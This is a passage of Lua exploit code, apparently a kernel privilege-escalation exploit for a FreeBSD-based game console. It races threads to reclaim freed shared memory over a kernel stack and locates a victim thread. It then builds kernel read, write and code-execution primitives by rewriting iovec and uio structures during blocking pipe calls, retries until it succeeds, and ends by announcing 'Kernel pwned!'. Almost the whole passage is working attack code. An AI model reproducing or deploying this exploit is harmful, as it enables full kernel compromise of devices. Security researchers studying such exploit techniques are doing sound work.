				warnf("starting reclaim thread #%u failed", i)
			end
		end

		logf("reclaim threads started")

		-- When doing thread creation memory of freed SHM object can be occupied and initialized with zeros.
		-- See: sys_thr_new -> kern_thr_new -> thread_create -> kern_thr_alloc

		-- Kick all reclaim threads at once, thus they will start real execution at same time.
		memory.write32(estate.ready_flag_addr, 1)

		logf("checking if reclaimed memory belongs to controlled thread")

		-- Check if mapped buffer overlaps kernel stack of our reclaim thread.
		local pattern = pb4(exp.RECLAIMED_THREAD_MARKER_BASE):sub(1, 3)
		local num_attempts = 1
		local thread_id

		local scan_size = 0x1000
		local scan_addr = estate.kstack_addr + (globals.kstack_size - scan_size)

		for i = 1, exp.MAX_SEARCH_LOOP_ATTEMPTS do
			-- Let reclaimed threads some time to run.
			usleep(main_rop, exp.KSTACK_WAIT_PERIOD)

			-- Determine if mapped memory region is readable.
			local mem_size = memory.determine_size(estate.kstack_addr, 1)
			if mem_size == nil or mem_size:is_zero() then
				-- Does kernel reclaimed our VM object?
				dbgf("reading reclaimed memory failed")
				break
			end

			local kstack_buf = memory.read_buffer(scan_addr, scan_size - 0x10)
			local pos

			if dump_kstack_partially then
				-- Determine if we have some data in mapped buffer.
				pos = kstack_buf:find("[^\0]")
				if pos ~= nil then
					logf("\n%s\n", hexdump(kstack_buf))
				end
			end

			pos = kstack_buf:find(pattern, 1, true)
			if pos ~= nil then
				dbgf("pattern found")

				if dump_kstack then
					logf("kernel stack:\n%s\n", hexdump(kstack_buf))
				end

				local kptrs, num_kptrs = scan_buffer_for_kptrs(kstack_buf)
				if num_kptrs > 0 then
					if dump_kstack_ptrs then
						logf("kernel pointers in kernel stack:");
						logf(inspect(kptrs))
					end

					local heap_kptrs = {}

					if kptrs.heap ~= nil then
						for i, kptr in ipairs(kptrs.heap) do
							local key = tostring(kptr)
							if heap_kptrs[key] == nil then
								heap_kptrs[key] = 0
							end
							heap_kptrs[key] = heap_kptrs[key] + 1
						end
					end

					kptrs = table.sort_keys(heap_kptrs, function(a, b)
						return a > b
					end)

					if #kptrs > 0 then
						local key = kptrs[1]
						if heap_kptrs[key] >= exp.TD_OCCURRENCE_THRESHOLD then
							local kthread_addr = uint64:new(key)
							logf("kernel thread @ %s", kthread_addr)
							estate.victim_kthread_addr = kthread_addr
						else
							warnf("thread kptr threshold not reached")
						end
					end
				end

				-- Get last byte of pattern and convert it to thread index.
				local thread_index = string.byte(kstack_buf, pos + #pattern) - 0x41
				dbgf("thread index: %d", thread_index)

				if thread_index >= 1 and thread_index <= #estate.reclaim_thrs then
					local thr = estate.reclaim_thrs[thread_index]
					assert(thr ~= nil)

					thread_id = thr:thread_id()
					memory.write32(estate.victim_thread_id_addr, thread_id)

					logf("found victim thread using %u attempts: %d (0x%x)", num_attempts, thread_id, thread_id)
					break
				end
			end

			num_attempts = num_attempts + 1
		end

		if thread_id ~= nil then
			status = true
		else
			warnf("finding victim thread failed");
		end

		-- Trigger other threads to terminate execution.
		memory.write32(estate.destroy_flag_addr, 1)

		-- Let reclaimed thread to do blocking call.
		usleep(main_rop, exp.FINAL_WAIT_PERIOD)

		logf("joining reclaim threads")

		for i = 1, exp.MAX_RECLAIM_OBJECTS do
			local thr = estate.reclaim_thrs[i]

			if thr:thread_id() == thread_id then
				logf("saving victim thread #%u", i)

				if toggle_state_debugging then
					logf("victim thread rop stack @ %s", thr:thread_rop():data_addr())
					logf(thr:dump_rop_stack(filter_addr_keys(estate)))
				end

				estate.victim_thread_id = thread_id
				estate.victim_thread_index = i
				estate.victim_thr = thr
			else
				dbgf("joining reclaim thread #%u", i)
				if not thr:join() then
					errorf("joining reclaim thread #%u failed", i)
				end
			end

			estate.reclaim_thrs[i] = nil
		end

		logf("reclaim threads joined")

		estate.reclaim_thrs = nil

		collectgarbage()
	else
		warnf("mapping memory of victim fd %d failed", lookup_fd)

		-- Trigger all threads to terminate execution.
		memory.write32(estate.destroy_flag_addr, 1)
	end

	-- Give threads some time to finish their job.
	usleep(main_rop, exp.FINAL_WAIT_PERIOD)

	logf("joining racing thread #1")

	if not estate.lookup_thr:join() then
		errorf("joining racing thread #1 failed")
	end

	logf("racing thread #1 joined")

	estate.lookup_thr = nil

	logf("joining racing threads #2")

	for i = 1, exp.MAX_DESTROYER_THREADS do
		dbgf("joining racing thread #2/#%u", i)

		local thr = estate.destroyer_thrs[i]

		if not thr:join() then
			errorf("joining racing thread #2/#%u failed", i)
		end
	end

	logf("racing threads #2 joined")

	estate.destroyer_thrs = nil

	-- Release shared memory of all ROP chains and if reclaim was successful
	-- then recreate memory for reclaimed thread only using same address as
	-- before thus it will continue its execution normally.

	if estate.victim_thread_index ~= nil then
		logf("releasing shared memory and recreating it for reclaimed thread #%u", estate.victim_thread_index)
		if not release_and_recreate_shared_memory_if_needed(main_rop, estate.victim_thread_index) then
			warnf("releasing shared memory and recreating it for reclaimed thread #%u failed", estate.victim_thread_index)
		end
	else
		logf("releasing shared memory")
		if not release_and_recreate_shared_memory_if_needed(main_rop) then
			warnf("releasing shared memory failed")
		end
	end

	if not status then
		-- Do not unmap memory otherwise kernel may panic.
		--dbgf("unmapping memory %s of size 0x%x", estate.kstack_addr, globals.kstack_size)
		--if not unmap_memory(main_rop, estate.kstack_addr, globals.kstack_size) then
		--	errorf("unmapping memory failed")
		--end

		estate.exec_rop = nil
	else
		assert(estate.victim_thread_index ~= nil)
	end

	collectgarbage()

	return status
end

runner(function()
	local num_attempts = 1

	while true do
		local status = true

		if not prepare_exploit() then
			errorf("preparation failed")
		end

		logf("doing initial exploitation")
		status = initial_exploit()
		if not status then
			warnf("initial exploitation failed")
		end

		if status then
			logf("doing post exploitation")
			status = post_exploit()
			if status then
				break
			else
				warnf("post exploitation failed")
			end
		end

		num_attempts = num_attempts + 1

		sleep(main_rop, 1)
	end

	logf("exploitation done in %u attempts", num_attempts)
end)

-------------------------------------------------------------------------------

local function kern_ensure_buffer_size(size)
	if is_uint64(size) then
		if size > exp.MAX_PIPE_BUFFER_SIZE then
			warnf("too large size %s", size)
			return nil
		end
		size = size.lo
	else
		assert(type(size) == "number")
		if size > exp.MAX_PIPE_BUFFER_SIZE then
			warnf("too large size 0x%x", size)
			return nil
		end
	end
	return size
end

function kern_read_slow(rop, kaddr, uaddr, size)
	assert(type(rop) == "table")

	-- Blocking algorithm for pipe:
	-- 1) On main thread start writing to pipe until we fill buffer of size equal to |BIG_PIPE_SIZE| (or |estate.pipe_buf_capacity|).
	--    Each write size should be less than |PIPE_MINDIRECT|, otherwise it will trigger |pipe_direct_write| which is
	--    not good if we want proper blocking.
	-- 2) On reclaim thread do write to same pipe again, thus getting block, then we should modify kernel stack of this thread and
	--    change |struct iov| and |struct uio|.
	-- 3) On main thread start reading from pipe using size of |BIG_PIPE_SIZE| (or |estate.pipe_buf_capacity|). It will unblock
	--    reclaim thread, so it starts writing to pipe using modified parameters. We should ignore data that was read.
	-- 4) On main thread start reading from same pipe again, but now using size we used when did modification.

	-- pipe_write(struct file* fp, struct uio* uio, struct ucred* active_cred, int flags, struct thread* td)
	--   uiomove(void* cp = &wpipe->pipe_buffer.buffer[wpipe->pipe_buffer.in], int n = segsize, struct uio* uio = uio)
	--     uiomove_faultflag(void* cp = cp, int n = n, struct uio* uio = uio, int nofault = 0)
	--       UIO_USERSPACE: copyin(const void* uaddr = iov->iov_base, void* kaddr = cp, size_t len = cnt)
	--       UIO_SYSSPACE: bcopy(const void* src = iov->iov_base, void* dst = cp, size_t len = cnt)

	assert(is_uint64(kaddr) or type(kaddr) == "number")
	assert(is_uint64(uaddr) or type(uaddr) == "number")

	size = kern_ensure_buffer_size(size)
	if size == nil then
		return nil
	elseif size == 0 then
		return 0
	end

	local return_value_addr = estate.thread_return_value_addr + (exp.MAX_DESTROYER_THREADS + estate.victim_thread_index) * 0x8
	local errno_addr = estate.thread_errno_addr + (exp.MAX_DESTROYER_THREADS + estate.victim_thread_index) * 0x8

	local result, errno

	-- Clear pipe buffer.
	--mem_clear(rop, estate.pipe_buf_addr, estate.pipe_buf_capacity)

	-- Clear scratch area.
	memory.write64(return_value_addr, 0)
	memory.write64(errno_addr, 0)

	-- Set up parameters for kernel function stack manipulation.
	memory.write32(estate.cmd_wait_flag_addr, 1)
	memory.write64(estate.rw_src_ptr_addr, kaddr)
	memory.write64(estate.rw_dst_ptr_addr, uaddr)
	memory.write64(estate.rw_size_addr, size)

	-- Preparation step to make further write call blocking.
	local count = math.floor(estate.pipe_buf_capacity / exp.MAX_PIPE_BUFFER_SIZE)
	--dbgf("pipe write count: %d", count)

	local garbage_size = 0

	for i = 1, count do
		--dbgf("writing to pipe fd %d at %s of size 0x%x", estate.wpipe_fd, estate.pipe_buf_addr, exp.MAX_PIPE_BUFFER_SIZE)
		result, errno = do_syscall_safe(rop, "write", estate.wpipe_fd, estate.pipe_buf_addr, exp.MAX_PIPE_BUFFER_SIZE)
		if result:is_minus_one() then
			warnf("write failed (errno:%d)", errno)
			return nil
		elseif result.lo == 0 then
			--dbgf("writing done")
			break
		end
		garbage_size = garbage_size + result.lo
		--dbgf("written 0x%x", result.lo)
	end

	--dbgf("garbage size 0x%x", garbage_size)

	-- Issue read command.
	--dbgf("issuing read command")
	memory.write32(estate.cmd_addr, exp.CMD_KREAD)

	-- Wait for blocking write call on other thread.
	yield(rop)

	-- We have this partial stack layout:
	--   struct {
	--     struct iovec aiov;
	--     struct uio auio;
	--   };
	--
	-- To locate it inside buffer let's make search pattern based on known |aiov|.

	local aiov = make_iovec(nil, { base = estate.pipe_buf_addr, len = size })
	--dbgf("aiov buffer:\n%s\n", hexdump(aiov))

	local scan_size = 0x1000
	local scan_addr = estate.kstack_addr + (globals.kstack_size - scan_size)

	--dbgf("scanning kernel stack at %s of size 0x%x", scan_addr, scan_size)

	while memory.read32(estate.cmd_wait_flag_addr) == 1 do
		local kstack_buf = memory.read_buffer(scan_addr, scan_size - 0x10)
		----dbgf("kernel stack:\n%s\n", hexdump(kstack_buf))

		local pos = kstack_buf:find(aiov, 1, true)
		if pos ~= nil then
			local offset = pos - 1

			local aiov_uaddr = scan_addr + offset
			local auio_uaddr = aiov_uaddr + globals.sizeof_iovec

			--dbgf("BINGO at 0x%x (%s)!!!", offset, aiov_uaddr)

			local base = memory.read64(aiov_uaddr + globals.offsetof_iovec_base)
			local len = memory.read32(aiov_uaddr + globals.offsetof_iovec_len)
			local segflg = memory.read32(auio_uaddr + globals.offsetof_uio_segflg)
			local rw = memory.read32(auio_uaddr + globals.offsetof_uio_rw)

			--dbgf("iovec:\n%s", inspect(parse_iovec(aiov_uaddr)))
			--dbgf("uio:\n%s", inspect(parse_uio(auio_uaddr)))

			if base == estate.pipe_buf_addr and len == size and segflg == globals.UIO_USERSPACE and rw == globals.UIO_WRITE then
				--dbgf("GOT MATCH!!!")

				--dbgf("old values: iovec_base:%s iovec_len:0x%x", base, len)
				--dbgf("new values: iovec_base:%s iovec_len:0x%x", kaddr, size)

				memory.write64(aiov_uaddr + globals.offsetof_iovec_base, kaddr)
				memory.write32(auio_uaddr + globals.offsetof_uio_segflg, globals.UIO_SYSSPACE)

				break
			end
		end

		yield(rop)
	end

	-- Extra step to unblock write call on other thread by reading back garbage data from pipe.
	--dbgf("reading garbage from pipe fd %d at %s of size 0x%x", estate.rpipe_fd, estate.pipe_buf_addr, garbage_size)
	result, errno = do_syscall_safe(rop, "read", estate.rpipe_fd, estate.pipe_buf_addr, garbage_size)
	if result:is_minus_one() then
		warnf("read failed (errno:%d)", errno)
		return nil
	elseif result.lo ~= garbage_size then
		warnf("read result is not consistent: %d vs %d", result.lo, garbage_size)
	end

	-- Wait until reclaim thread report about result.
	while memory.read32(estate.cmd_wait_flag_addr) == 1 do
		yield(rop)
	end

	-- Get result from reclaim thread.
	result = memory.read64(return_value_addr)
	errno = memory.read32(errno_addr)

	--dbgf("reclaim thread result:%s errno:%d", result, errno)

	if result:is_minus_one() then
		warnf("write failed (errno:%d)", errno)
		return nil
	elseif result.lo ~= size then
		warnf("write result is not consistent: %d vs %d", result.lo, size)
	end

	-- Read data from corresponding pipe.
	--dbgf("reading data from pipe fd %d at %s of size 0x%x", estate.rpipe_fd, uaddr, size)
	result, errno = do_syscall_safe(rop, "read", estate.rpipe_fd, uaddr, size)
	--dbgf("our result:%s errno:%d", result, errno)
	if result:is_minus_one() then
		warnf("read failed (errno:%d)", errno)
		return nil
	end

	--dbgf("total read: 0x%x", result.lo)

	return result.lo
end

function kern_write_slow(rop, kaddr, uaddr, size, params)
	assert(type(rop) == "table")

	-- pipe_read(struct file* fp, struct uio* uio, struct ucred* active_cred, int flags, struct thread* td)
	--   uiomove(void* cp = &rpipe->pipe_buffer.buffer[rpipe->pipe_buffer.out], int n = size, struct uio* uio = uio)
	--     uiomove_faultflag(void* cp = cp, int n = n, struct uio* uio = uio, int nofault = 0)
	--       UIO_USERSPACE: copyout(const void* kaddr = cp, void* uaddr = iov->iov_base, size_t len = cnt)
	--       UIO_SYSSPACE: bcopy(const void* src = cp, void* dst = iov->iov_base, size_t len = cnt)

	assert(is_uint64(kaddr) or type(kaddr) == "number")
	assert(is_uint64(uaddr) or type(uaddr) == "number")

	local result, errno
	local result2, errno2

	size = kern_ensure_buffer_size(size)
	if size == nil then
		return nil
	elseif size == 0 then
		return 0
	end

	local return_value_addr = estate.thread_return_value_addr + (exp.MAX_DESTROYER_THREADS + estate.victim_thread_index) * 0x8
	local errno_addr = estate.thread_errno_addr + (exp.MAX_DESTROYER_THREADS + estate.victim_thread_index) * 0x8

	-- Clear pipe buffer.
	--mem_clear(rop, estate.pipe_buf_addr, estate.pipe_buf_capacity)

	-- Clear scratch area.
	memory.write64(return_value_addr, 0)
	memory.write64(errno_addr, 0)

	-- Set up parameters for kernel function stack manipulation.
	memory.write32(estate.cmd_wait_flag_addr, 1)
	memory.write64(estate.rw_src_ptr_addr, uaddr)
	memory.write64(estate.rw_dst_ptr_addr, kaddr)
	memory.write64(estate.rw_size_addr, size)

	-- Issue write command.
	--dbgf("issuing write command")
	memory.write32(estate.cmd_addr, exp.CMD_KWRITE)

	-- Wait for blocking read call on other thread.
	yield(rop)

	-- We have this partial stack layout:
	--   struct {
	--     struct iovec aiov;
	--     struct uio auio;
	--   };
	--
	-- To locate it inside buffer let's make search pattern based on known |aiov|.

	local aiov = make_iovec(nil, { base = estate.pipe_buf_addr, len = size })
	--dbgf("aiov buffer:\n%s\n", hexdump(aiov))

	local scan_size = 0x1000
	local scan_addr = estate.kstack_addr + (globals.kstack_size - scan_size)

	--dbgf("scanning kernel stack at %s of size 0x%x", scan_addr, scan_size)

	while memory.read32(estate.cmd_wait_flag_addr) == 1 do
		local kstack_buf = memory.read_buffer(scan_addr, scan_size - 0x10)
		--dbgf("kernel stack:\n%s\n", hexdump(kstack_buf))

		local pos = kstack_buf:find(aiov, 1, true)
		if pos ~= nil then
			local offset = pos - 1

			local aiov_uaddr = scan_addr + offset
			local auio_uaddr = aiov_uaddr + globals.sizeof_iovec

			--dbgf("BINGO at 0x%x (%s)!!!", offset, aiov_uaddr)

			local base = memory.read64(aiov_uaddr + globals.offsetof_iovec_base)
			local len = memory.read32(aiov_uaddr + globals.offsetof_iovec_len)
			local segflg = memory.read32(auio_uaddr + globals.offsetof_uio_segflg)
			local rw = memory.read32(auio_uaddr + globals.offsetof_uio_rw)

			--dbgf("iovec:\n%s", inspect(parse_iovec(aiov_uaddr)))
			--dbgf("uio:\n%s", inspect(parse_uio(auio_uaddr)))

			if base == estate.pipe_buf_addr and len == size and segflg == globals.UIO_USERSPACE and rw == globals.UIO_READ then
				--dbgf("GOT MATCH!!!")

				--dbgf("old values: iovec_base:%s iovec_len:0x%x", base, len)
				--dbgf("new values: iovec_base:%s iovec_len:0x%x", kaddr, size)

				memory.write64(aiov_uaddr + globals.offsetof_iovec_base, kaddr)
				memory.write32(auio_uaddr + globals.offsetof_uio_segflg, globals.UIO_SYSSPACE)

				break
			end
		end

		yield(rop)
	end

	-- Write data into corresponding pipe.
	--dbgf("writing data to pipe fd %d at %s of size 0x%x", estate.wpipe_fd, uaddr, size)
	result, errno = do_syscall_safe(rop, "write", estate.wpipe_fd, uaddr, size)
	--dbgf("our result:%s errno:%d", result, errno)
	if result:is_minus_one() then
		warnf("write failed (errno:%d)", errno)
		return nil
	end

	-- Wait until reclaim thread report about result.
	while memory.read32(estate.cmd_wait_flag_addr) == 1 do
		yield(rop)
	end

	-- Get result from reclaim thread.
	result2 = memory.read64(return_value_addr)
	errno2 = memory.read32(errno_addr)

	--dbgf("reclaim thread result:%s errno:%d", result2, errno2)

	if result2:is_minus_one() then
		warnf("read failed (errno:%d)", errno2)
		return nil
	end

	-- Need to ensure that results are consistent.
	if result.lo ~= result2.lo then
		warnf("read/write results are not consistent: %d vs %d", result2.lo, result.lo)
	end

	--dbgf("total written: 0x%x", result2.lo)

	return result2.lo
end

function kern_exec(rop, rop_cb, body_cb)
	assert(type(rop) == "table")

	-- Fill ROP chain.
	assert(type(estate.exec_rop) ~= nil)
	estate.exec_rop:reset()

	if type(rop_cb) == "function" then
		rop_cb(estate.exec_rop)
	end

	local stack_return_addr = memory.read64(estate.reclaim_thread_stack_return_addr + (estate.victim_thread_index - 1) * 0x8)
	assert(stack_return_addr:is_non_zero())

	estate.exec_rop:push_set_rsp(stack_return_addr)
	estate.exec_rop:fixup_markers()

	if toggle_state_debugging then
		logf("exec rop stack @ %s", estate.exec_rop:data_addr())
		logf(estate.exec_rop:dump(filter_addr_keys(estate)))
	end

	-- Set up parameters for kernel function stack manipulation.
	memory.write32(estate.cmd_wait_flag_addr, 1)

	-- Issue execute command.
	--dbgf("issuing execute command")
	memory.write32(estate.cmd_addr, exp.CMD_KEXEC)

	local done = false

	while memory.read32(estate.cmd_wait_flag_addr) == 1 do
		if not done and type(body_cb) == "function" then
			local result = body_cb(rop, estate.kstack_addr, globals.kstack_size)
			if result ~= nil and not result then
				done = true
			end
		end

		yield(rop)
	end
end

function kern_leak_stack_kptrs(rop, rop_cb, sleep_time, dump_ptrs)
	if dump_ptrs == nil then
		dump_ptrs = false
	end

	if sleep_time ~= nil then
		make_timespec(estate.timeout_addr, sleep_time)
	else
		make_timespec(estate.timeout_addr, { sec = 1, nsec = 0 })
	end

	local all_kptrs = {}
	local scan_size = 0x1000

	kern_exec(rop, function(rop)
		rop:push_syscall_noret("nanosleep", estate.timeout_addr, 0)

		if type(rop_cb) == "function" then
			rop_cb(rop)
		end
	end, function(rop, stack_addr, stack_size)
		local addr = stack_addr + (stack_size - scan_size)
		local buf = memory.read_buffer(addr, scan_size)

		--dbgf("scanning kernel at %s stack of size 0x%x", addr, scan_size)

		if dump_kstack then
			logf("kernel stack:\n%s\n", hexdump(buf))
		end

		local kptrs, num_kptrs = scan_buffer_for_kptrs(buf)
		if num_kptrs > 0 and dump_ptrs then
			logf("kernel pointers in kernel stack:");
			logf(inspect(kptrs))
		end

		table.merge(all_kptrs, kptrs)
	end)

	return all_kptrs
end

kern_read = kern_read_slow
kern_write = kern_write_slow

send_notification_text(main_rop, 0, {
	type = globals.NOTIFICATION_TYPE_REQUEST,
	message = "Kernel pwned!"
})